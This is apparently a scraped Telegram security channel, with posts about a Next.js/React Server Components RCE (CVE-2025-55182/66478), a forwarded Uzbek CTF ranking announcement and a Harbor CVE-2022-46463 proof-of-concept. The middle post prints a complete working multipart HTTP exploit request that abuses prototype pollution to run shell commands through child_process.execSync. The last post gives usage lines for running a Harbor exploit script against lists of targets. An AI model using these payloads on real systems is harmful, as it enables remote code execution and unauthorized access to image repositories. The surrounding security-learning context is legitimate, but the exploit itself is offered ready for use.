React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.
https://github.com/hackersatyamrastogi/react2shell-ultimate
https://github.com/hackersatyamrastogi/react2shell-ultimate
🔥1
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3#file-cve-2025-55182-http
There is Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add .yaml POC for your Nuclei !
There is Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add .yaml POC for your Nuclei !
Gist
CVE-2025-55182 React Server Components RCE POC
CVE-2025-55182 React Server Components RCE POC. GitHub Gist: instantly share code, notes, and snippets.
POC:
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
In the field of cybersecurity, it is essential to continuously study publicly available exploits or vulnerabilities discovered in certain technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!
#tryhackme #pentest #cybersecurity #CVE
#tryhackme #pentest #cybersecurity #CVE
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!
☠️ Turan Security va 🇺🇿O'zbekiston sharafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirishga hissa qo’shish.
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirishga hissa qo’shish.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍2❤1
Forwarded from Private Shizo
CVE-2022-46463.zip
2.9 KB
💥PoC for CVE-2022-46463
An access control issue in Harbor v
Usage:
An access control issue in Harbor v
1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.Usage:
python3 cve-2022-46463.py -u TargetURL
python3 cve-2022-46463.py -f targetListUrlFile